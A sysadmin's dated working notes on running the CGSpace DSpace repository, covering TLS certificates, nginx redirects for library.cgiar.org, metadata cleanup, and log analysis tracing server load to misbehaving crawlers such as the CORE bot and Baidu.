  • +
  • I also went and added the WLE approvers and editors groups to the appropriate steps of all the Phase I and Phase II research theme collections
  • +
  • A lot of CIAT’s items have manually generated thumbnails which have an incorrect aspect ratio and an ugly black border
  • +
  • I communicated with Elizabeth from CIAT to tell her she should use DSpace’s automatically generated thumbnails
  • +
  • Start discussing with ICT about the Linode server update for DSpace Test
  • +
  • Rosemary said I need to work with Robert Okal to destroy/create the server, and then let her and Lilian Masigah from finance know the updated Linode asset names for their records
  • +
+

2017-09-28

+
    +
  • Tunji from the System Organization finally sent the DNS request for library.cgiar.org to CGNET
  • +
  • Now the redirects work
  • +
  • I quickly registered a Let’s Encrypt certificate for the domain:
  • +
+
# systemctl stop nginx
+# /opt/certbot-auto certonly --standalone --email aorth@mjanja.ch -d library.cgiar.org
+# systemctl start nginx
+
    +
  • I modified the nginx configuration of the ansible playbooks to use this new certificate and now the certificate is enabled and OCSP stapling is working:
  • +
+
$ openssl s_client -connect cgspace.cgiar.org:443 -servername library.cgiar.org  -tls1_2 -tlsextdebug -status
+...
+OCSP Response Data:
+...
+Cert Status: good
+
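  • A hedged sketch of the relevant vhost directives (the paths follow certbot’s default layout; the rest of the TLS settings come from the existing template):
ssl_certificate     /etc/letsencrypt/live/library.cgiar.org/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/library.cgiar.org/privkey.pem;
ssl_stapling        on;
ssl_stapling_verify on;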

October, 2017

+ +
+

2017-10-01

+ +
http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+
    +
  • There appears to be a pattern but I’ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
  • +
  • Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
  • +
+

2017-10-02

+
    +
  • Peter Ballantyne said he was having problems logging into CGSpace with “both” of his accounts (CGIAR LDAP and personal, apparently)
  • +
  • I looked in the logs and saw some LDAP lookup failures due to timeout but also strangely a “no DN found” error:
  • +
+
2017-10-01 20:24:57,928 WARN  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:ldap_attribute_lookup:type=failed_search javax.naming.CommunicationException\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is java.net.ConnectException\colon; Connection timed out (Connection timed out)]
+2017-10-01 20:22:37,982 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:failed_login:no DN found for user pballantyne
+
    +
  • I thought maybe his account had expired (seeing as it was the first of the month) but he says he was finally able to log in today
  • +
  • The logs for yesterday show fourteen errors related to LDAP auth failures:
  • +
+
$ grep -c "ldap_authentication:type=failed_auth" dspace.log.2017-10-01
+14
+
    +
  • For what it’s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET’s LDAP server
  • +
  • Linode emailed to say that linode578611 (DSpace Test) needs to migrate to a new host for a security update so I initiated the migration immediately rather than waiting for the scheduled time in two weeks
  • +
+

2017-10-04

+
    +
  • Twice in the last twenty-four hours Linode has alerted about high CPU usage on CGSpace (linode2533629)
  • +
  • Communicate with Sam from the CGIAR System Organization about some broken links coming from their CGIAR Library domain to CGSpace
  • +
  • The first is a link to a browse page that should be handled better in nginx:
  • +
+
http://library.cgiar.org/browse?value=Intellectual%20Assets%20Reports&type=subject → https://cgspace.cgiar.org/browse?value=Intellectual%20Assets%20Reports&type=subject
+
    +
  • We’ll need to check for browse links and handle them properly, including swapping the subject parameter for systemsubject (which doesn’t exist in Discovery yet, but we’ll need to add it), as we have moved their poorly curated subjects from dc.subject to cg.subject.system (see the nginx sketch after this list)
  • +
  • The second link was a direct link to a bitstream which has broken due to the sequence being updated, so I told him he should link to the handle of the item instead
  • +
  • Help Sisay proof sixty-two IITA records on DSpace Test
  • +
  • Lots of inconsistencies and errors in subjects, dc.format.extent, regions, countries
  • +
  • Merge the Discovery search changes for ISI Journal (#341)
  • +
+
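  • As referenced above, a very rough sketch of the kind of nginx rule I have in mind for the library.cgiar.org vhost (the real rewrites will surely end up more complicated):
# hypothetical: send old CGIAR Library browse links to CGSpace, translating subject to systemsubject
location /browse {
    if ($arg_type = 'subject') {
        return 301 https://cgspace.cgiar.org/browse?type=systemsubject&value=$arg_value;
    }
    return 301 https://cgspace.cgiar.org$request_uri;
}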

2017-10-05

+
    +
  • Twice in the past twenty-four hours Linode has warned that CGSpace’s outbound traffic rate was exceeding the notification threshold
  • +
  • I had a look at yesterday’s OAI and REST logs in /var/log/nginx but didn’t see anything unusual:
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
+    141 157.55.39.240
+    145 40.77.167.85
+    162 66.249.66.92
+    181 66.249.66.95
+    211 66.249.66.91
+    312 66.249.66.94
+    384 66.249.66.90
+   1495 50.116.102.77
+   3904 70.32.83.92
+   9904 45.5.184.196
+# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
+      5 66.249.66.71
+      6 66.249.66.67
+      6 68.180.229.31
+      8 41.84.227.85
+      8 66.249.66.92
+     17 66.249.66.65
+     24 66.249.66.91
+     38 66.249.66.95
+     69 66.249.66.90
+    148 66.249.66.94
+
    +
  • Working on the nginx redirects for CGIAR Library
  • +
  • We should start using 301 redirects and also allow for /sitemap to work on the library.cgiar.org domain so the CGIAR System Organization people can update their Google Search Console and allow Google to find their content in a structured way
  • +
  • Remove eleven occurrences of ACP in IITA’s cg.coverage.region using the Atmire batch edit module from Discovery
  • +
  • Need to investigate how we can verify the library.cgiar.org using the HTML or DNS methods
  • +
  • Run corrections on 143 ILRI Archive items that had two dc.identifier.uri values (Handle) that Peter had pointed out earlier this week
  • +
  • I used OpenRefine to isolate them and then fixed and re-imported them into CGSpace
  • +
  • I manually checked a dozen of them and it appeared that the correct handle was always the second one, so I just deleted the first one
  • +
+
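  • For reference, a GREL custom facet along these lines isolates the rows whose dc.identifier.uri cell has more than one value (a rough sketch):
value.split("||").length() > 1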

2017-10-06

+ +

Original flat thumbnails +Tweaked with border and box shadow

+
    +
  • I’ll post it to the Yammer group to see what people think
  • +
  • I figured out a way to do the HTML verification in the Google Search Console for library.cgiar.org
  • +
  • We can drop the HTML file in their XMLUI theme folder and it will get copied to the webapps directory during build/install
  • +
  • Then we add an nginx alias for that URL in the library.cgiar.org vhost
  • +
  • This method is kind of a hack, but at least we can put all the pieces into git to be reproducible
  • +
  • I will tell Tunji to send me the verification file
  • +
+

2017-10-10

+
    +
  • Deploy logic to allow verification of the library.cgiar.org domain in the Google Search Console (#343)
  • +
  • After verifying both the HTTP and HTTPS domains and submitting a sitemap it will be interesting to see how the stats in the console as well as the search results change (currently 28,500 results):
  • +
+

Google Search Console +Google Search Console 2 +Google Search results

+
    +
  • I tried to submit a “Change of Address” request in the Google Search Console but I need to be an owner on CGSpace’s console (currently I’m just a user) in order to do that
  • +
  • Manually clean up some communities and collections that Peter had requested a few weeks ago
  • +
  • Delete Community 10568/102 (ILRI Research and Development Issues)
  • +
  • Move five collections to 10568/27629 (ILRI Projects) using move-collections.sh with the following configuration:
  • +
+
10568/1637 10568/174 10568/27629
+10568/1642 10568/174 10568/27629
+10568/1614 10568/174 10568/27629
+10568/75561 10568/150 10568/27629
+10568/183 10568/230 10568/27629
+
    +
  • Delete community 10568/174 (Sustainable livestock futures)
  • +
  • Delete collections in 10568/27629 that have zero items (33 of them!)
  • +
+

2017-10-11

+
    +
  • Peter added me as an owner on the CGSpace property on Google Search Console and I tried to submit a “Change of Address” request for the CGIAR Library but got an error:
  • +
+

Change of Address error

+
    +
  • We are sending top-level CGIAR Library traffic to their specific community hierarchy in CGSpace so this type of change of address won’t work—we’ll just need to wait for Google to slowly index everything and take note of the HTTP 301 redirects
  • +
  • Also the Google Search Console doesn’t work very well with Google Analytics being blocked, so I had to turn off my ad blocker to get the “Change of Address” tool to work!
  • +
+

2017-10-12

+
    +
  • Finally finish (I think) working on the myriad nginx redirects for all the CGIAR Library browse stuff—it ended up getting pretty complicated!
  • +
  • I still need to commit the DSpace changes (add browse index, XMLUI strings, Discovery index, etc), but I should be able to deploy that on CGSpace soon
  • +
+

2017-10-14

+
    +
  • Run system updates on DSpace Test and reboot server
  • +
  • Merge changes adding a search/browse index for CGIAR System subject to 5_x-prod (#344)
  • +
  • I checked the top browse links in Google’s search results for site:library.cgiar.org inurl:browse and they are all redirected appropriately by the nginx rewrites I worked on last week
  • +
+

2017-10-22

+
    +
  • Run system updates on DSpace Test and reboot server
  • +
  • Re-deploy CGSpace from latest 5_x-prod (adds ISI Journal to search filters and adds Discovery index for CGIAR Library systemsubject)
  • +
  • Deploy nginx redirect fixes to catch CGIAR Library browse links (redirect to their community and translate subject→systemsubject)
  • +
  • Run migration of CGSpace server (linode18) for Linode security alert, which took 42 minutes of downtime
  • +
+

2017-10-26

+
    +
  • In the last 24 hours we’ve gotten a few alerts from Linode that there was high CPU and outgoing traffic on CGSpace
  • +
  • Uptime Robot even noticed CGSpace go “down” for a few minutes
  • +
  • In other news, I was trying to look at a question about stats raised by Magdalena and then CGSpace went down due to the PostgreSQL connection pool being exhausted
  • +
  • Looking at the PostgreSQL activity I see there are 93 connections, but after a minute or two they went down and CGSpace came back up
  • +
  • Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again
  • +
  • Still not sure where the load is coming from right now, but it’s clear why there were so many alerts yesterday on the 25th!
  • +
+
# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
+18022
+
    +
  • Compared to other days there were two or three times the number of requests yesterday!
  • +
+
# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
+3141
+# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
+7851
+
    +
  • I still have no idea what was causing the load to go up today
  • +
  • I finally investigated Magdalena’s issue with the item download stats and now I can’t reproduce it: I get the same number of downloads reported in the stats widget on the item page, the “Most Popular Items” page, and in Usage Stats
  • +
  • I think it might have been an issue with the statistics not being fresh
  • +
  • I added the admin group for the systems organization to the admin role of the top-level community of CGSpace because I guess Sisay had forgotten
  • +
  • Magdalena asked if there was a way to reuse data in item submissions where items have a lot of similar data
  • +
  • I told her about the possibility to use per-collection item templates, and asked if her items in question were all from a single collection
  • +
  • We’ve never used it but it could be worth looking at
  • +
+

2017-10-27

+
    +
  • Linode alerted about high CPU usage again (twice) on CGSpace in the last 24 hours, around 2AM and 2PM
  • +
+

2017-10-28

+
    +
  • Linode alerted about high CPU usage again on CGSpace around 2AM this morning
  • +
+

2017-10-29

+
    +
  • Linode alerted about high CPU usage again on CGSpace around 2AM and 4AM
  • +
  • I’m still not sure why this started causing alerts so repeatedly over the past week
  • +
  • I don’t see any telltale signs in the REST or OAI logs, so I’m trying to do some rudimentary analysis in the DSpace logs:
  • +
+
# grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+2049
+
    +
  • So there were 2049 unique sessions during the hour of 2AM
  • +
  • Looking at my notes, the number of unique sessions was about the same during the same hour on other days when there were no alerts
  • +
  • I think I’ll need to enable access logging in nginx to figure out what’s going on
  • +
  • After enabling logging on requests to XMLUI on / I see some new bot I’ve never seen before:
  • +
+
137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] "GET /discover?filtertype_0=type&filter_relational_operator_0=equals&filter_0=Internal+Document&filtertype=author&filter_relational_operator=equals&filter=CGIAR+Secretariat HTTP/1.1" 200 7776 "-" "Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)"
+
    +
  • CORE seems to be some bot that is “Aggregating the world’s open access research papers”
  • +
  • The contact address listed in their bot’s user agent is incorrect; the correct page is simply: https://core.ac.uk/contact
  • +
  • I will check the logs in a few days to see if they are harvesting us regularly, then add their bot’s user agent to the Tomcat Crawler Session Valve
  • +
  • After browsing the CORE site it seems that the CGIAR Library is somehow a member of CORE, so they have probably only been harvesting CGSpace since we did the migration, as library.cgiar.org directs to us now
  • +
  • For now I will just contact them to have them update their contact info in the bot’s user agent, but eventually I think I’ll tell them to swap out the CGIAR Library entry for CGSpace
  • +
+

2017-10-30

+
    +
  • Like clock work, Linode alerted about high CPU usage on CGSpace again this morning (this time at 8:13 AM)
  • +
  • Uptime Robot noticed that CGSpace went down around 10:15 AM, and I saw that there were 93 PostgreSQL connections:
  • +
+
dspace=# SELECT * FROM pg_stat_activity;
+...
+(93 rows)
+
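  • A more useful breakdown to remember for next time (assuming a PostgreSQL version where pg_stat_activity has a state column):
dspace=# SELECT datname, state, count(*) FROM pg_stat_activity GROUP BY datname, state ORDER BY count(*) DESC;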
    +
  • Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:
  • +
+
# grep -c "CORE/0.6" /var/log/nginx/access.log 
+26475
+# grep -c "CORE/0.6" /var/log/nginx/access.log.1
+135083
+
    +
  • IP addresses for this bot currently seem to be:
  • +
+
# grep "CORE/0.6" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
+137.108.70.6
+137.108.70.7
+
    +
  • I will add their user agent to the Tomcat Crawler Session Manager Valve but it won’t help much because they are only using two sessions:
  • +
+
# grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
+session_id=5771742CABA3D0780860B8DA81E0551B
+session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
+
    +
  • … and most of their requests are for dynamic discover pages:
  • +
+
# grep -c 137.108.70 /var/log/nginx/access.log
+26622
+# grep 137.108.70 /var/log/nginx/access.log | grep -c "GET /discover"
+24055
+
    +
  • Just because I’m curious who the top IPs are:
  • +
+
# awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
+    496 62.210.247.93
+    571 46.4.94.226
+    651 40.77.167.39
+    763 157.55.39.231
+    782 207.46.13.90
+    998 66.249.66.90
+   1948 104.196.152.243
+   4247 190.19.92.5
+  31602 137.108.70.6
+  31636 137.108.70.7
+
    +
  • At least we know the top two are CORE, but who are the others?
  • +
  • 190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Cloud Engine
  • +
  • Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don’t reuse their session variable, creating thousands of new sessions!
  • +
+
# grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+1419
+# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+2811
+
    +
  • From looking at the requests, it appears these are from CIAT and CCAFS
  • +
  • I wonder if I could somehow instruct them to use a user agent so that we could apply a crawler session manager valve to them
  • +
  • Actually, according to the Tomcat docs, we could use an IP with crawlerIps: https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Crawler_Session_Manager_Valve
  • +
  • Ah, wait, it looks like crawlerIps only came in 2017-06, so probably isn’t in Ubuntu 16.04’s 7.0.68 build!
  • +
  • That would explain the errors I was getting when trying to set it:
  • +
+
WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
+
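  • For my notes, a rough reconstruction of the valve entry in Tomcat’s server.xml (the crawlerUserAgents value here is illustrative; the crawlerIps value is the one from the warning above, and it needs a Tomcat newer than Ubuntu 16.04’s 7.0.68):
<!-- hypothetical sketch; crawlerIps is not supported by Tomcat 7.0.68 -->
<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*"
       crawlerIps="190\.19\.92\.5|104\.196\.152\.243" />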
    +
  • As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:
  • +
+
# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
+    410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
+    574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
+   1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
+
    +
  • I will check again tomorrow
  • +
+

2017-10-31

+
    +
  • Very nice, Linode alerted that CGSpace had high CPU usage at 2AM again
  • +
  • Ask on the dspace-tech mailing list if it’s possible to use an existing item as a template for a new item
  • +
  • To follow up on the CORE bot traffic, there were almost 300,000 requests yesterday:
  • +
+
# grep "CORE/0.6" /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
+ 139109 137.108.70.6
+ 139253 137.108.70.7
+
    +
  • I’ve emailed the CORE people to ask if they can update the repository information from CGIAR Library to CGSpace
  • +
  • Also, I asked if they could perhaps use the sitemap.xml, OAI-PMH, or REST APIs to index us more efficiently, because they mostly seem to be crawling the nearly endless Discovery facets (see the examples after the GoAccess note below)
  • +
  • I added GoAccess to the list of packages to install in the DSpace role of the Ansible infrastructure scripts
  • +
  • It makes it very easy to analyze nginx logs from the command line, to see where traffic is coming from:
  • +
+
# goaccess /var/log/nginx/access.log --log-format=COMBINED
+
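  • Back to the suggestion for CORE above: what I have in mind is something like these (standard DSpace 5 endpoints; the parameters are just illustrative):
$ curl -s 'https://cgspace.cgiar.org/rest/items?limit=100&offset=0'
$ curl -s 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&metadataPrefix=oai_dc'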
    +
  • According to Uptime Robot CGSpace went down and up a few times
  • +
  • I had a look at goaccess and I saw that CORE was actively indexing
  • +
  • Also, PostgreSQL connections were at 91 (with the max being 60 per web app, hmmm)
  • +
  • I’m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable
  • +
  • Actually, come to think of it, they aren’t even obeying robots.txt, because we actually disallow /discover and /search-filter URLs but they are hitting those massively:
  • +
+
# grep "CORE/0.6" /var/log/nginx/access.log | grep -o -E "GET /(discover|search-filter)" | sort -n | uniq -c | sort -rn 
+ 158058 GET /discover
+  14260 GET /search-filter
+
    +
  • I tested a URL of pattern /discover in Google’s webmaster tools and it was indeed identified as blocked
  • +
  • I will send feedback to the CORE bot team
  • +
+

November, 2017

+ +
+

2017-11-01

+
    +
  • The CORE developers responded to say they are looking into their bot not respecting our robots.txt
  • +
+

2017-11-02

+
    +
  • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
  • +
+
# grep -c "CORE" /var/log/nginx/access.log
+0
+
    +
  • Generate list of authors on CGSpace for Peter to go through and correct:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+
    +
  • Abenet asked if it would be possible to generate a report of items in Listings and Reports that had “International Fund for Agricultural Development” as the only investor
  • +
  • I opened a ticket with Atmire to ask if this was possible: https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=540
  • +
  • Work on making the thumbnails in the item view clickable
  • +
  • Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link
  • +
+
//mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
+
    +
  • METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml
  • +
  • I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!
  • +
  • Help proof fifty-three CIAT records for Sisay: https://dspacetest.cgiar.org/handle/10568/95895
  • +
  • A handful of issues with cg.place using a format like “Lima, PE” instead of “Lima, Peru”
  • +
  • Also, some dates with completely invalid formats like “2010- 06” and “2011-3-28”
  • +
  • I also collapsed some consecutive whitespace on a handful of fields
  • +
+

2017-11-03

+
    +
  • Atmire got back to us to say that they estimate it will take two days of labor to implement the change to Listings and Reports
  • +
  • I said I’d ask Abenet if she wants that feature
  • +
+

2017-11-04

+
    +
  • I finished looking through Sisay’s CIAT records for the “Alianzas de Aprendizaje” data
  • +
  • I corrected about half of the authors to standardize them
  • +
  • Linode emailed this morning to say that the CPU usage was high again, this time at 6:14AM
  • +
  • It’s the first time in a few days that this has happened
  • +
  • I had a look to see what was going on, but it isn’t the CORE bot:
  • +
+
# awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
+    306 68.180.229.31
+    323 61.148.244.116
+    414 66.249.66.91
+    507 40.77.167.16
+    618 157.55.39.161
+    652 207.46.13.103
+    666 157.55.39.254
+   1173 104.196.152.243
+   1737 66.249.66.90
+  23101 138.201.52.218
+
    +
  • 138.201.52.218 is from some Hetzner server, and I see it making 40,000 requests yesterday too, but none before that:
  • +
+
# zgrep -c 138.201.52.218 /var/log/nginx/access.log*
+/var/log/nginx/access.log:24403
+/var/log/nginx/access.log.1:45958
+/var/log/nginx/access.log.2.gz:0
+/var/log/nginx/access.log.3.gz:0
+/var/log/nginx/access.log.4.gz:0
+/var/log/nginx/access.log.5.gz:0
+/var/log/nginx/access.log.6.gz:0
+
    +
  • It’s clearly a bot as it’s making tens of thousands of requests, but it’s using a “normal” user agent:
  • +
+
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+
    +
  • For now I don’t know what this user is!
  • +
+

2017-11-05

+
    +
  • Peter asked if I could fix the appearance of “International Livestock Research Institute” in the author lookup during item submission
  • +
  • It looks to be just an issue with the user interface expecting authors to have both a first and last name:
  • +
+

Author lookup +Add author

+
    +
  • But in the database the authors are correct (none with weird , / characters):
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
+                 text_value                 |              authority               | confidence 
+--------------------------------------------+--------------------------------------+------------
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |          0
+ International Livestock Research Institute | f4db1627-47cd-4699-b394-bab7eba6dadc |          0
+ International Livestock Research Institute |                                      |         -1
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |        600
+ International Livestock Research Institute | f4db1627-47cd-4699-b394-bab7eba6dadc |         -1
+ International Livestock Research Institute |                                      |        600
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |         -1
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |        500
+(8 rows)
+
    +
  • So I’m not sure if this is just a graphical glitch or if editors have to edit this metadata field prior to approval
  • +
  • Looking at monitoring Tomcat’s JVM heap with Prometheus, it looks like we need to use JMX + jmx_exporter
  • +
  • This guide shows how to enable JMX in Tomcat by modifying CATALINA_OPTS
  • +
  • I was able to successfully connect to my local Tomcat with jconsole!
  • +
+
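  • The gist of the CATALINA_OPTS change is something like this (a hedged sketch; the port and the wide-open security settings are only for local testing):
CATALINA_OPTS="$CATALINA_OPTS -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false"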

2017-11-07

+
    +
  • CGSpace went down and up a few times this morning, first around 3AM, then around 7AM
  • +
  • Tsega had to restart Tomcat 7 to fix it temporarily
  • +
  • I will start by looking at bot usage (access.log.1 includes usage until 6AM today):
  • +
+
# cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    619 65.49.68.184
+    840 65.49.68.199
+    924 66.249.66.91
+   1131 68.180.229.254
+   1583 66.249.66.90
+   1953 207.46.13.103
+   1999 207.46.13.80
+   2021 157.55.39.161
+   2034 207.46.13.36
+   4681 104.196.152.243
+
    +
  • 104.196.152.243 seems to be a top scraper for a few weeks now:
  • +
+
# zgrep -c 104.196.152.243 /var/log/nginx/access.log*
+/var/log/nginx/access.log:336
+/var/log/nginx/access.log.1:4681
+/var/log/nginx/access.log.2.gz:3531
+/var/log/nginx/access.log.3.gz:3532
+/var/log/nginx/access.log.4.gz:5786
+/var/log/nginx/access.log.5.gz:8542
+/var/log/nginx/access.log.6.gz:6988
+/var/log/nginx/access.log.7.gz:7517
+/var/log/nginx/access.log.8.gz:7211
+/var/log/nginx/access.log.9.gz:2763
+
    +
  • This user is responsible for hundreds and sometimes thousands of Tomcat sessions:
  • +
+
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+954
+$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+6199
+$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+7051
+
    +
  • The worst thing is that this user never specifies a user agent string so we can’t lump it in with the other bots using the Tomcat Crawler Session Manager Valve
  • +
  • They don’t request dynamic URLs like “/discover” but they seem to be fetching handles from XMLUI instead of REST (and some with //handle, note the regex below):
  • +
+
# grep -c 104.196.152.243 /var/log/nginx/access.log.1
+4681
+# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
+4618
+
    +
  • I just realized that ciat.cgiar.org points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior
  • +
  • The next IP (207.46.13.36) seem to be Microsoft’s bingbot, but all its requests specify the “bingbot” user agent and there are no requests for dynamic URLs that are forbidden, like “/discover”:
  • +
+
$ grep -c 207.46.13.36 /var/log/nginx/access.log.1 
+2034
+# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c "GET /discover"
+0
+
    +
  • The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:
  • +
+
# grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c "GET /discover"
+0
+
    +
  • The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like “/discover”:
  • +
+
# grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 
+5997
+# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "bingbot"
+5988
+# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
+0
+
    +
  • The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like “/discover”:
  • +
+
# grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 
+3048
+# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
+3048
+# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
+0
+
    +
  • The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like “/discover”:
  • +
+
# grep -c 68.180.229.254 /var/log/nginx/access.log.1 
+1131
+# grep  68.180.229.254 /var/log/nginx/access.log.1 | grep -c "GET /discover"
+0
+
    +
  • The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:
  • +
+
# grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 
+2950
+# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
+330
+
    +
  • Their user agents vary, ie: +
      +
    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
    • +
    • Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
    • +
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    • +
    +
  • +
  • I’ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs
  • +
  • While it’s not in the top ten, Baidu is one bot that seems to not give a fuck:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep -c Baiduspider
+8912
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep Baiduspider | grep -c -E "GET /(browse|discover|search-filter)"
+2521
+
    +
  • According to their documentation their bot respects robots.txt, but I don’t see this being the case
  • +
  • I think I will end up blocking Baidu as well…
  • +
  • Next is for me to look and see what was happening specifically at 3AM and 7AM when the server crashed
  • +
  • I should look in nginx access.log, rest.log, oai.log, and DSpace’s dspace.log.2017-11-07
  • +
  • Here are the top IPs making requests to XMLUI from 2 to 8 AM:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    279 66.249.66.91
+    373 65.49.68.199
+    446 68.180.229.254
+    470 104.196.152.243
+    470 197.210.168.174
+    598 207.46.13.103
+    603 157.55.39.161
+    637 207.46.13.80
+    703 207.46.13.36
+    724 66.249.66.90
+
    +
  • Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot
  • +
  • Here are the top IPs making requests to REST from 2 to 8 AM:
  • +
+
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+      8 207.241.229.237
+     10 66.249.66.90
